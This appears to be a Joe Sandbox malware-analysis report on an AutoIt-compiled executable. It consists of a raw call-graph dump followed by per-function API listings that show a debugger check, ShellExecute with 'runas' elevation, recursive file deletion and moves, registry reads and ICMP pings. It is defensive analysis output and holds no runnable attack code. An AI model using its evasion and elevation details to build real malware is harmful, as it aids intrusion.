99999->100000 100006 2a0732 100000->100006 100001 2a07ad 100038 298a4d 58 API calls __malloc_crt 100001->100038 100004 2a07b4 100011 2a07a6 100004->100011 100039 29a05b InitializeCriticalSectionAndSpinCount 100004->100039 100005 2a0823 _fseek 100005->99987 100006->100001 100008 299ec3 __mtinitlocknum 58 API calls 100006->100008 100006->100011 100036 296e7d 59 API calls __lock 100006->100036 100037 296ee7 LeaveCriticalSection LeaveCriticalSection _doexit 100006->100037 100008->100006 100010 2a07da EnterCriticalSection 100010->100011 100033 2a082e 100011->100033 100014 2a0857 __wopenfile 100013->100014 100015 2a0871 100014->100015 100027 2a0a2c 100014->100027 100046 2939fb 60 API calls 2 library calls 100014->100046 100044 298d58 58 API calls __getptd_noexit 100015->100044 100017 2a0876 100045 298fe6 9 API calls __beginthreadex 100017->100045 100019 2a0a8f 100041 2a87d1 100019->100041 100023 2a0a25 100023->100027 100047 2939fb 60 API calls 2 library calls 100023->100047 100025 2a0a44 100025->100027 100027->100015 100027->100019 100028->99983 100029->99997 100030->99997 100031->99997 100040 299fa5 LeaveCriticalSection 100033->100040 100035 2a0835 100035->100005 100036->100006 100037->100006 100038->100004 100039->100010 100040->100035 100049 2a7fb5 100041->100049 100044->100017 100046->100023 100047->100025 100052 2a7fc1 _fseek 100049->100052 100061 284af7 100060->100061 100062 284bb3 LoadLibraryA 100060->100062 100061->99939 100061->99942 100062->100061 100063 284bc4 GetProcAddress 100062->100063 100063->100061 100069->99951 100179 29581d 100176->100179 100178 284ad5 100178->99967 100180 295829 _fseek 100179->100180 100181 29586c 100180->100181 100182 295864 _fseek 100180->100182 100187 29583f _memset 100180->100187 100183 296e3e __lock_file 59 API calls 100181->100183 100182->100178 100184 295872 100183->100184 100206 298d58 58 API calls __getptd_noexit 100187->100206 100188 295859 100206->100188 100529 279a6c 100532 27829c 100529->100532 100531 279a78 100533 278308 100532->100533 100534 2782b4 100532->100534 100538 278331 100533->100538 100541 2da48d 89 API calls 4 library calls 100533->100541 100534->100533 100535 2753b0 301 API calls 100534->100535 100539 2782eb 100535->100539 100537 2b0ed8 100537->100537 100538->100531 100539->100538 100540 27523c 59 API calls 100539->100540 100540->100533 100541->100537 100542 284d83 100543 284dba 100542->100543 100544 284dd8 100543->100544 100545 284e37 100543->100545 100582 284e35 100543->100582 100546 284ead PostQuitMessage 100544->100546 100547 284de5 100544->100547 100549 284e3d 100545->100549 100550 2c09c2 100545->100550 100576 284e28 100546->100576 100553 284df0 100547->100553 100554 2c0a35 100547->100554 100548 284e1a DefWindowProcW 100548->100576 100551 284e42 100549->100551 100552 284e65 SetTimer RegisterWindowMessageW 100549->100552 100597 27c460 10 API calls Mailbox 100550->100597 100556 284e49 KillTimer 100551->100556 100557 2c0965 100551->100557 100558 284e8e CreatePopupMenu 100552->100558 100552->100576 100559 284df8 100553->100559 100560 284eb7 100553->100560 100600 2d2cce 97 API calls _memset 100554->100600 100565 285ac3 Shell_NotifyIconW 100556->100565 100563 2c099e MoveWindow 100557->100563 100564 2c096a 100557->100564 100558->100576 100566 2c0a1a 100559->100566 100567 284e03 100559->100567 100587 285b29 100560->100587 100562 2c09e9 100598 27c483 301 API calls Mailbox 100562->100598 100563->100576 100571 2c098d SetFocus 100564->100571 100572 2c096e 100564->100572 100573 284e5c 100565->100573 100566->100548 100599 2c8854 59 API calls Mailbox 100566->100599 100574 284e9b 100567->100574 100575 284e0e 100567->100575 100568 2c0a47 100568->100548 100568->100576 100571->100576 100572->100575 100577 2c0977 100572->100577 100594 2734e4 DeleteObject DestroyWindow Mailbox 100573->100594 100595 285bd7 107 API calls _memset 100574->100595 100575->100548 100584 285ac3 Shell_NotifyIconW 100575->100584 100596 27c460 10 API calls Mailbox 100577->100596 100582->100548 100583 284eab 100583->100576 100585 2c0a0e 100584->100585 100586 2859d3 94 API calls 100585->100586 100586->100582 100588 285b40 _memset 100587->100588 100589 285bc2 100587->100589 100590 2856f8 87 API calls 100588->100590 100589->100576 100592 285b67 100590->100592 100591 285bab KillTimer SetTimer 100591->100589 100592->100591 100593 2c0d6e Shell_NotifyIconW 100592->100593 100593->100591 100594->100576 100595->100583 100596->100576 100597->100562 100598->100575 100599->100582 100600->100568 100601 279a88 100604 2786e0 100601->100604 100605 2786fd 100604->100605 100606 2b0ff8 100605->100606 100607 2b0fad 100605->100607 100628 278724 100605->100628 100644 2eaad0 301 API calls __cinit 100606->100644 100610 2b0fb5 100607->100610 100613 2b0fc2 100607->100613 100607->100628 100642 2eb0e4 301 API calls 100610->100642 100611 292f70 __cinit 67 API calls 100611->100628 100629 27898d 100613->100629 100643 2eb58c 301 API calls 3 library calls 100613->100643 100616 273c30 68 API calls 100616->100628 100617 2b1289 100617->100617 100618 2b11af 100646 2eae3b 89 API calls 100618->100646 100619 273f42 68 API calls 100619->100628 100622 278a17 100623 2739be 68 API calls 100623->100628 100626 27523c 59 API calls 100626->100628 100628->100611 100628->100616 100628->100618 100628->100619 100628->100622 100628->100623 100628->100626 100628->100629 100630 2753b0 301 API calls 100628->100630 100631 281c9c 59 API calls 100628->100631 100633 273938 68 API calls 100628->100633 100634 27855e 301 API calls 100628->100634 100635 275278 100628->100635 100640 2784e2 89 API calls 100628->100640 100641 27835f 301 API calls 100628->100641 100645 2c73ab 59 API calls 100628->100645 100629->100622 100647 2da48d 89 API calls 4 library calls 100629->100647 100630->100628 100631->100628 100633->100628 100634->100628 100636 290fe6 Mailbox 59 API calls 100635->100636 100637 275285 100636->100637 100638 275294 100637->100638 100639 281a36 59 API calls 100637->100639 100638->100628 100639->100638 100640->100628 100641->100628 100642->100613 100643->100629 100644->100628 100645->100628 100646->100629 100647->100617 100648 2adc5a 100649 290fe6 Mailbox 59 API calls 100648->100649 100650 2adc61 100649->100650 100651 2adc7a _memmove 100650->100651 100652 290fe6 Mailbox 59 API calls 100650->100652 100653 290fe6 Mailbox 59 API calls 100651->100653 100652->100651 100654 2adc9f 100653->100654 100655 277357 100656 277360 100655->100656 100657 2778f5 100655->100657 100656->100657 100658 274d37 84 API calls 100656->100658 100664 276fdb Mailbox 100657->100664 100666 2c87f9 59 API calls _memmove 100657->100666 100659 27738b 100658->100659 100659->100657 100660 27739b 100659->100660 100662 281680 59 API calls 100660->100662 100662->100664 100663 2af91b 100665 281c9c 59 API calls 100663->100665 100665->100664 100666->100663 100667 271016 100672 285ce7 100667->100672 100670 292f70 __cinit 67 API calls 100671 271025 100670->100671 100673 290fe6 Mailbox 59 API calls 100672->100673 100674 285cef 100673->100674 100675 27101b 100674->100675 100679 285f39 100674->100679 100675->100670 100680 285f42 100679->100680 100681 285cfb 100679->100681 100682 292f70 __cinit 67 API calls 100680->100682 100683 285d13 100681->100683 100682->100681 100684 281207 59 API calls 100683->100684 100685 285d2b GetVersionExW 100684->100685 100686 281821 59 API calls 100685->100686 100687 285d6e 100686->100687 100688 281981 59 API calls 100687->100688 100696 285d9b 100687->100696 100689 285d8f 100688->100689 100690 28133d 59 API calls 100689->100690 100690->100696 100691 285e00 GetCurrentProcess IsWow64Process 100692 285e19 100691->100692 100694 285e98 GetSystemInfo 100692->100694 100695 285e2f 100692->100695 100693 2c1098 100697 285e65 100694->100697 100707 2855f0 100695->100707 100696->100691 100696->100693 100697->100675 100700 285e8c GetSystemInfo 100702 285e56 100700->100702 100701 285e41 100703 2855f0 2 API calls 100701->100703 100702->100697 100705 285e5c FreeLibrary 100702->100705 100704 285e49 GetNativeSystemInfo 100703->100704 100704->100702 100705->100697 100708 285619 100707->100708 100709 2855f9 LoadLibraryA 100707->100709 100708->100700 100708->100701 100709->100708 100710 28560a GetProcAddress 100709->100710 100710->100708 100711 271055 100716 272a19 100711->100716 100714 292f70 __cinit 67 API calls 100715 271064 100714->100715 100717 281207 59 API calls 100716->100717 100718 272a87 100717->100718 100723 271256 100718->100723 100720 272b24 100722 27105a 100720->100722 100726 2713f8 59 API calls 2 library calls 100720->100726 100722->100714 100727 271284 100723->100727 100726->100720 100728 271291 100727->100728 100730 271275 100727->100730 100729 271298 RegOpenKeyExW 100728->100729 100728->100730 100729->100730 100731 2712b2 RegQueryValueExW 100729->100731 100730->100720 100732 2712d3 100731->100732 100733 2712e8 RegCloseKey 100731->100733 100732->100733 100733->100730 100734 275ff5 100757 275ede Mailbox _memmove 100734->100757 100735 290fe6 59 API calls Mailbox 100735->100757 100736 276a9b 100945 27a9de 301 API calls 100736->100945 100738 2753b0 301 API calls 100738->100757 100739 2aeff9 100957 275190 59 API calls Mailbox 100739->100957 100741 2af007 100958 2da48d 89 API calls 4 library calls 100741->100958 100745 2aefeb 100791 275569 Mailbox 100745->100791 100956 2c6cf1 59 API calls Mailbox 100745->100956 100746 2760e5 100747 2ae137 100746->100747 100751 2763bd Mailbox 100746->100751 100762 276abc 100746->100762 100777 276152 Mailbox 100746->100777 100747->100751 100946 2c7aad 59 API calls 100747->100946 100748 281c9c 59 API calls 100748->100757 100750 281a36 59 API calls 100750->100757 100753 290fe6 Mailbox 59 API calls 100751->100753 100764 276426 100751->100764 100752 27523c 59 API calls 100752->100757 100756 2763d1 100753->100756 100755 2ec355 301 API calls 100755->100757 100758 2763de 100756->100758 100756->100762 100757->100735 100757->100736 100757->100738 100757->100739 100757->100741 100757->100746 100757->100748 100757->100750 100757->100752 100757->100755 100757->100762 100757->100791 100949 2d7f11 59 API calls Mailbox 100757->100949 100950 2c6cf1 59 API calls Mailbox 100757->100950 100760 276413 100758->100760 100761 2ae172 100758->100761 100760->100764 100790 275447 Mailbox 100760->100790 100947 2ec87c 85 API calls 2 library calls 100761->100947 100955 2da48d 89 API calls 4 library calls 100762->100955 100948 2ec9c9 95 API calls Mailbox 100764->100948 100767 2ae19d 100767->100767 100769 2ae691 100952 2da48d 89 API calls 4 library calls 100769->100952 100770 2af165 100960 2da48d 89 API calls 4 library calls 100770->100960 100773 290fe6 59 API calls Mailbox 100773->100790 100774 276e30 60 API calls 100774->100790 100775 2769fa 100779 281c9c 59 API calls 100775->100779 100776 2ae6a0 100777->100745 100777->100762 100782 2ae2e9 VariantClear 100777->100782 100777->100791 100797 2ee60c 130 API calls 100777->100797 100802 2d412a 3 API calls 100777->100802 100803 2ef1b2 91 API calls 100777->100803 100805 2dd6be 100777->100805 100850 2d413a 100777->100850 100853 27d679 100777->100853 100893 27cfd7 100777->100893 100912 2e5e1d 100777->100912 100937 2eebba 100777->100937 100944 275190 59 API calls Mailbox 100777->100944 100951 2c7aad 59 API calls 100777->100951 100778 2769ff 100778->100769 100778->100770 100779->100791 100781 2aea9a 100786 281c9c 59 API calls 100781->100786 100782->100777 100783 281c9c 59 API calls 100783->100790 100784 281207 59 API calls 100784->100790 100786->100791 100787 2c7aad 59 API calls 100787->100790 100788 2aeb67 100788->100791 100953 2c7aad 59 API calls 100788->100953 100790->100769 100790->100773 100790->100774 100790->100775 100790->100778 100790->100781 100790->100783 100790->100784 100790->100787 100790->100788 100790->100791 100792 292f70 67 API calls __cinit 100790->100792 100793 2aef28 100790->100793 100795 275a1a 100790->100795 100943 277e50 301 API calls 2 library calls 100790->100943 100792->100790 100954 2da48d 89 API calls 4 library calls 100793->100954 100959 2da48d 89 API calls 4 library calls 100795->100959 100797->100777 100802->100777 100803->100777 100806 2dd6dd 100805->100806 100807 2dd6e8 100805->100807 100808 27502b 59 API calls 100806->100808 100810 281207 59 API calls 100807->100810 100848 2dd7c2 Mailbox 100807->100848 100808->100807 100809 290fe6 Mailbox 59 API calls 100811 2dd80b 100809->100811 100812 2dd70c 100810->100812 100813 2dd817 100811->100813 100961 283df7 60 API calls Mailbox 100811->100961 100814 281207 59 API calls 100812->100814 100816 274d37 84 API calls 100813->100816 100817 2dd715 100814->100817 100818 2dd82f 100816->100818 100819 274d37 84 API calls 100817->100819 100820 283e47 67 API calls 100818->100820 100821 2dd721 100819->100821 100822 2dd83e 100820->100822 100823 290119 59 API calls 100821->100823 100824 2dd842 GetLastError 100822->100824 100826 2dd876 100822->100826 100825 2dd736 100823->100825 100827 2dd85b 100824->100827 100828 2817e0 59 API calls 100825->100828 100829 2dd8d8 100826->100829 100830 2dd8a1 100826->100830 100846 2dd7cb Mailbox 100827->100846 100962 283f0b CloseHandle 100827->100962 100831 2dd769 100828->100831 100833 290fe6 Mailbox 59 API calls 100829->100833 100832 290fe6 Mailbox 59 API calls 100830->100832 100838 2d412a 3 API calls 100831->100838 100849 2dd793 Mailbox 100831->100849 100835 2dd8a6 100832->100835 100834 2dd8dd 100833->100834 100841 281207 59 API calls 100834->100841 100834->100846 100839 2dd8b7 100835->100839 100842 281207 59 API calls 100835->100842 100837 27502b 59 API calls 100837->100848 100840 2dd779 100838->100840 100963 2dfc0d 59 API calls 2 library calls 100839->100963 100843 281a36 59 API calls 100840->100843 100840->100849 100841->100846 100842->100839 100845 2dd78a 100843->100845 100847 2d3f1d 63 API calls 100845->100847 100846->100777 100847->100849 100848->100809 100848->100846 100849->100837 100851 2d494a 3 API calls 100850->100851 100852 2d413f 100851->100852 100852->100777 100964 274f98 100853->100964 100857 290fe6 Mailbox 59 API calls 100858 27d6aa 100857->100858 100861 27d6ba 100858->100861 100991 283df7 60 API calls Mailbox 100858->100991 100859 2b5068 100860 27d6df 100859->100860 100996 2dfbb7 59 API calls 100859->100996 100864 27502b 59 API calls 100860->100864 100869 27d6ec 100860->100869 100863 274d37 84 API calls 100861->100863 100865 27d6c8 100863->100865 100866 2b50b0 100864->100866 100867 283e47 67 API calls 100865->100867 100868 2b50b8 100866->100868 100866->100869 100870 27d6d7 100867->100870 100872 27502b 59 API calls 100868->100872 100977 2841d6 100869->100977 100870->100859 100870->100860 100995 283f0b CloseHandle 100870->100995 100874 27d6f3 100872->100874 100875 2b50ca 100874->100875 100876 27d70d 100874->100876 100878 290fe6 Mailbox 59 API calls 100875->100878 100877 281207 59 API calls 100876->100877 100879 27d715 100877->100879 100880 2b50d0 100878->100880 100992 283b7b 65 API calls Mailbox 100879->100992 100882 2b50e4 100880->100882 100883 283ea1 2 API calls 100880->100883 100886 2b50e8 _memmove 100882->100886 100982 2d7c7f 100882->100982 100883->100882 100885 27d724 100885->100886 100993 274f3c 59 API calls Mailbox 100885->100993 100888 27d738 Mailbox 100889 27d772 100888->100889 100890 2842cf CloseHandle 100888->100890 100889->100777 100891 27d766 100890->100891 100891->100889 100994 283f0b CloseHandle 100891->100994 100894 274d37 84 API calls 100893->100894 100895 27d001 100894->100895 100896 275278 59 API calls 100895->100896 100897 27d018 100896->100897 100898 27502b 59 API calls 100897->100898 100899 27d57b 100897->100899 100906 27d439 Mailbox __NMSG_WRITE 100897->100906 100898->100906 100899->100777 100900 29312d _W_store_winword 60 API calls 100900->100906 100901 290c65 62 API calls 100901->100906 100902 28162d 59 API calls 100902->100906 100903 274f98 59 API calls 100903->100906 100906->100899 100906->100900 100906->100901 100906->100902 100906->100903 100907 274d37 84 API calls 100906->100907 100908 27502b 59 API calls 100906->100908 100909 281821 59 API calls 100906->100909 100910 2859d3 94 API calls 100906->100910 100911 285ac3 Shell_NotifyIconW 100906->100911 100997 28153b 59 API calls 2 library calls 100906->100997 100998 274f3c 59 API calls Mailbox 100906->100998 100907->100906 100908->100906 100909->100906 100910->100906 100911->100906 100913 2e5e46 100912->100913 100914 2e5e74 WSAStartup 100913->100914 100916 27502b 59 API calls 100913->100916 100915 2e5e9d 100914->100915 100926 2e5e88 Mailbox 100914->100926 100917 2840cd 59 API calls 100915->100917 100918 2e5e61 100916->100918 100919 2e5ea6 100917->100919 100918->100914 100921 27502b 59 API calls 100918->100921 100920 274d37 84 API calls 100919->100920 100923 2e5eb2 100920->100923 100922 2e5e70 100921->100922 100922->100914 100924 28402a 61 API calls 100923->100924 100925 2e5ebf inet_addr gethostbyname 100924->100925 100925->100926 100927 2e5edd IcmpCreateFile 100925->100927 100926->100777 100927->100926 100928 2e5f01 100927->100928 100929 290fe6 Mailbox 59 API calls 100928->100929 100930 2e5f1a 100929->100930 100931 28433f 59 API calls 100930->100931 100932 2e5f25 100931->100932 100933 2e5f34 IcmpSendEcho 100932->100933 100934 2e5f55 IcmpSendEcho 100932->100934 100935 2e5f6d 100933->100935 100934->100935 100936 2e5fd4 IcmpCloseHandle WSACleanup 100935->100936 100936->100926 100938 2eebcd 100937->100938 100939 274d37 84 API calls 100938->100939 100942 2eebdc 100938->100942 100940 2eec0a 100939->100940 100999 2d7ce4 100940->100999 100942->100777 100943->100790 100944->100777 100945->100762 100946->100751 100947->100764 100948->100767 100949->100757 100950->100757 100951->100777 100952->100776 100953->100791 100954->100795 100955->100745 100956->100791 100957->100745 100958->100745 100959->100791 100960->100791 100961->100813 100962->100846 100963->100846 100966 2add2b 100964->100966 100968 274fa8 100964->100968 100965 2add3c 100967 2819e1 59 API calls 100965->100967 100966->100965 100969 281821 59 API calls 100966->100969 100970 2add46 100967->100970 100971 290fe6 Mailbox 59 API calls 100968->100971 100969->100965 100974 274fd4 100970->100974 100975 281207 59 API calls 100970->100975 100972 274fbb 100971->100972 100972->100970 100973 274fc6 100972->100973 100973->100974 100976 281a36 59 API calls 100973->100976 100974->100857 100974->100859 100975->100974 100976->100974 100978 28410a 2 API calls 100977->100978 100979 2841f7 100978->100979 100980 28410a 2 API calls 100979->100980 100981 28420b 100980->100981 100981->100874 100983 2d7c8a 100982->100983 100984 290fe6 Mailbox 59 API calls 100983->100984 100985 2d7c91 100984->100985 100986 2d7c9d 100985->100986 100987 2d7cbe 100985->100987 100988 290fe6 Mailbox 59 API calls 100986->100988 100989 290fe6 Mailbox 59 API calls 100987->100989 100990 2d7ca6 _memset 100988->100990 100989->100990 100990->100886 100991->100861 100992->100885 100993->100888 100994->100889 100995->100859 100996->100859 100997->100906 100998->100906 101000 2d7cf1 100999->101000 101001 290fe6 Mailbox 59 API calls 101000->101001 101002 2d7cf8 101001->101002 101005 2d6135 101002->101005 101004 2d7d3b Mailbox 101004->100942 101006 281aa4 59 API calls 101005->101006 101007 2d6148 CharLowerBuffW 101006->101007 101009 2d615b 101007->101009 101008 2d6165 _memset Mailbox 101008->101004 101009->101008 101010 2d6195 101009->101010 101012 281609 59 API calls 101009->101012 101011 2d61a7 101010->101011 101013 281609 59 API calls 101010->101013 101014 290fe6 Mailbox 59 API calls 101011->101014 101012->101009 101013->101011 101018 2d61d5 101014->101018 101017 2d6233 101017->101008 101020 290fe6 Mailbox 59 API calls 101017->101020 101019 2d61f4 101018->101019 101038 2d6071 59 API calls 101018->101038 101023 2d6292 101019->101023 101021 2d624d 101020->101021 101022 290fe6 Mailbox 59 API calls 101021->101022 101022->101008 101024 281207 59 API calls 101023->101024 101025 2d62c4 101024->101025 101026 281207 59 API calls 101025->101026 101027 2d62cd 101026->101027 101028 281207 59 API calls 101027->101028 101034 2d62d6 _wcscmp 101028->101034 101029 281821 59 API calls 101029->101034 101030 293836 GetStringTypeW 101030->101034 101031 28153b 59 API calls 101031->101034 101033 2937ba 59 API calls 101033->101034 101034->101029 101034->101030 101034->101031 101034->101033 101035 2d6292 60 API calls 101034->101035 101036 2d65ab Mailbox 101034->101036 101037 281c9c 59 API calls 101034->101037 101039 29385c GetStringTypeW _iswctype 101034->101039 101035->101034 101036->101017 101037->101034 101038->101018 101039->101034 101040 2b01f8 101041 2b01fa 101040->101041 101044 2d4d18 SHGetFolderPathW 101041->101044 101045 281821 59 API calls 101044->101045 101046 2b0203 101045->101046 101047 27107d 101052 282fc5 101047->101052 101049 27108c 101050 292f70 __cinit 67 API calls 101049->101050 101051 271096 101050->101051 101053 282fd5 __ftell_nolock 101052->101053 101054 281207 59 API calls 101053->101054 101055 28308b 101054->101055 101056 2900cf 61 API calls 101055->101056 101057 283094 101056->101057 101083 2908c1 101057->101083 101060 281900 59 API calls 101061 2830ad 101060->101061 101062 284c94 59 API calls 101061->101062 101063 2830bc 101062->101063 101064 281207 59 API calls 101063->101064 101065 2830c5 101064->101065 101066 2819e1 59 API calls 101065->101066 101067 2830ce RegOpenKeyExW 101066->101067 101068 2c01a3 RegQueryValueExW 101067->101068 101071 2830f0 Mailbox 101067->101071 101069 2c0235 RegCloseKey 101068->101069 101070 2c01c0 101068->101070 101069->101071 101082 2c0247 _wcscat Mailbox __NMSG_WRITE 101069->101082 101072 290fe6 Mailbox 59 API calls 101070->101072 101071->101049 101073 2c01d9 101072->101073 101075 28433f 59 API calls 101073->101075 101074 281609 59 API calls 101074->101082 101076 2c01e4 RegQueryValueExW 101075->101076 101077 2c0201 101076->101077 101079 2c021b 101076->101079 101078 281821 59 API calls 101077->101078 101078->101079 101079->101069 101080 281a36 59 API calls 101080->101082 101081 284c94 59 API calls 101081->101082 101082->101071 101082->101074 101082->101080 101082->101081 101084 2a1b70 __ftell_nolock 101083->101084 101085 2908ce GetFullPathNameW 101084->101085 101086 2908f0 101085->101086 101087 281821 59 API calls 101086->101087 101088 28309f 101087->101088 101088->101060

                                                                            Executed Functions

                                                                            Function 00285240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147windowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0028526C
                                                                            • IsDebuggerPresent.KERNEL32 ref: 0028527E
                                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 002852E6
                                                                              • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
                                                                              • Part of subcall function 0027BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0027BC07
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00285366
                                                                            • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 002C0B2E
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 002C0B66
                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00326D10), ref: 002C0BE9
                                                                            • ShellExecuteW.SHELL32(00000000), ref: 002C0BF0
                                                                              • Part of subcall function 0028514C: GetSysColorBrush.USER32(0000000F), ref: 00285156
                                                                              • Part of subcall function 0028514C: LoadCursorW.USER32(00000000,00007F00), ref: 00285165
                                                                              • Part of subcall function 0028514C: LoadIconW.USER32(00000063), ref: 0028517C
                                                                              • Part of subcall function 0028514C: LoadIconW.USER32(000000A4), ref: 0028518E
                                                                              • Part of subcall function 0028514C: LoadIconW.USER32(000000A2), ref: 002851A0
                                                                              • Part of subcall function 0028514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 002851C6
                                                                              • Part of subcall function 0028514C: RegisterClassExW.USER32(?), ref: 0028521C
                                                                              • Part of subcall function 002850DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00285109
                                                                              • Part of subcall function 002850DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0028512A
                                                                              • Part of subcall function 002850DB: ShowWindow.USER32(00000000), ref: 0028513E
                                                                              • Part of subcall function 002850DB: ShowWindow.USER32(00000000), ref: 00285147
                                                                              • Part of subcall function 002859D3: _memset.LIBCMT ref: 002859F9
                                                                              • Part of subcall function 002859D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00285A9E
                                                                            Strings
                                                                            • runas, xrefs: 002C0BE4
                                                                            • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 002C0B28
                                                                            • AutoIt, xrefs: 002C0B23
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                            • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                            • API String ID: 529118366-2030392706
                                                                            • Opcode ID: 0af4da0232c257dee5d8a490ae07144fb51a10ffd997de30170f9b01f1bae98d
                                                                            • Instruction ID: 0ef7f12a70ba1e6d9d08514598e4c821d0bd3c705249c4a8a20b56958250f032
                                                                            • Opcode Fuzzy Hash: 0af4da0232c257dee5d8a490ae07144fb51a10ffd997de30170f9b01f1bae98d
                                                                            • Instruction Fuzzy Hash: A4512978926259ABCB13FBB0DC95EEE7B7CAF05740F104599F451A21E2CAB01935CF21
                                                                            Function 002D3CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1037 2d3ce2-2d3d48 call 281207 * 4 call 290284 * 2 call 2d4f82 call 2d4fec 1054 2d3d4a-2d3d4e call 281900 1037->1054 1055 2d3d53-2d3d5d call 2d4fec 1037->1055 1054->1055 1059 2d3d5f-2d3d63 call 281900 1055->1059 1060 2d3d68-2d3da6 call 281207 * 2 call 290119 FindFirstFileW 1055->1060 1059->1060 1068 2d3dac 1060->1068 1069 2d3eb4-2d3ebb FindClose 1060->1069 1070 2d3db2-2d3db4 1068->1070 1071 2d3ebe-2d3ef6 call 281cb6 * 6 1069->1071 1070->1069 1072 2d3dba-2d3dc1 1070->1072 1074 2d3e88-2d3e9b FindNextFileW 1072->1074 1075 2d3dc7-2d3e1f call 281a36 call 2d4561 call 281cb6 call 281c9c call 2817e0 call 281900 call 2d412a 1072->1075 1074->1070 1078 2d3ea1-2d3ea6 1074->1078 1102 2d3e21-2d3e24 1075->1102 1103 2d3e40-2d3e44 1075->1103 1078->1070 1104 2d3eab-2d3eb2 FindClose 1102->1104 1105 2d3e2a-2d3e3c call 28151f 1102->1105 1106 2d3e46-2d3e49 1103->1106 1107 2d3e72-2d3e78 call 2d3ef7 1103->1107 1104->1071 1114 2d3e4e-2d3e57 MoveFileW 1105->1114 1117 2d3e3e DeleteFileW 1105->1117 1110 2d3e59-2d3e69 call 2d3ef7 1106->1110 1111 2d3e4b 1106->1111 1112 2d3e7d 1107->1112 1110->1104 1119 2d3e6b-2d3e70 DeleteFileW 1110->1119 1111->1114 1116 2d3e80-2d3e82 1112->1116 1114->1116 1116->1104 1120 2d3e84 1116->1120 1117->1103 1119->1116 1120->1074
                                                                            APIs
                                                                              • Part of subcall function 00290284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00282A58,?,00008000), ref: 002902A4
                                                                              • Part of subcall function 002D4FEC: GetFileAttributesW.KERNEL32(?,002D3BFE), ref: 002D4FED
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 002D3D96
                                                                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 002D3E3E
                                                                            • MoveFileW.KERNEL32(?,?), ref: 002D3E51
                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 002D3E6E
                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 002D3E90
                                                                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 002D3EAC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                            • String ID: \*.*
                                                                            • API String ID: 4002782344-1173974218
                                                                            • Opcode ID: 5814975d829a022a369342cbfabda9a7ce9d26d1e663ef08a602305a55e44f31
                                                                            • Instruction ID: ef87fc088c6b33ddbd1224418fb7fb7a095d77308d3452d9d5c4919ce3ccbc06
                                                                            • Opcode Fuzzy Hash: 5814975d829a022a369342cbfabda9a7ce9d26d1e663ef08a602305a55e44f31
                                                                            • Instruction Fuzzy Hash: E551713582215DAACF15FBA0D9929EDB77DAF10300F204166E445B72D2DB316F2ACF61
                                                                            Function 00285D13 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
